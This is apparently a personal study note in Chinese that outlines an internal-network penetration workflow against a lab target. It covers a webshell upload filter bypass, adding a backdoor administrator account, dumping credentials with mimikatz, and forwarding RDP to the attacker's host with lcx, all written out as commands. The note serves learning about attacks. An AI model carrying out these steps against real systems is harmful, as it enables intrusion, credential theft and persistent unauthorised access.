内网渗透的基本思路

内网渗透的基本思路

1.拿到外网web服务器权限

• 这里我使用的phpstudy搭建的靶机利用站点upload获取到基本web服务器权限。

• 进入站点

• 看到第一关，表示只能上传后缀为jpg|png|gif

• 这里我们借助Burpsuite工具将上传包含一句话木马后缀为png文件，后缀改为php,实现绕过。

  一句话木马，后缀为png

• 将包放过后出现一个图片形状，右击获取图片的地址。

http://192.168.146.137/upload/upload/526.php

• 通过蚁剑连接后台

2.查看自己的权限

• 蚁剑右击进入虚拟后台

• 终端输入whoami

desktop-ggg\system(administrator)最高权限
ssss\network\mysql\apache普通权限

3.设法提权

1.查看systeminfo,重点关注操作系统版本，位数（64/32）补丁编号如果没有kb423377(巴西烤肉漏洞)提权

2.ipconfig(查看肉鸡连接了几个网卡，连接几个网络)

3.netstat -ano(查看都有哪些内网主机与本机通信)
netstat -an | findstr "3389"查看端口

4.创建用户

net user bb bb@12345 /add #添加用户

net localgroup administrators bb /add #将用户添加到管理组

net user #查看用户

5.窃取administrator的密码

工具 mimitakz
工具用法： 双击mimitakz.exe ,
mimitakz:
privilege::debug
sekurlsa::logonpasswords 如果是密文（用kali软件）

6.利用新账号或administrator登录。登远程桌面（mstsc）

7.向肉鸡上传lcx.exe文件

8.在黑客机上执行 lcx.exe -listen 44444 55555

9.在肉鸡上执行 lcx.exe -slave 黑客 IP 44444 127.0.0.1 3389

在靶机上运行lcx.exe注意这个软件上传路径，在终端下要进入这个命令才能运行。

10.在黑客机上打开mstsc 127.0.0.1:55555

输入刚刚创建的用户名和密码

登入进去

11.nps /neo-reGeorg /ew/这一类的代理工具代理去带来

注：该文章用于自己学习笔记，切勿用于其它用途，否则本人不负责。

你就这样走了吗？？？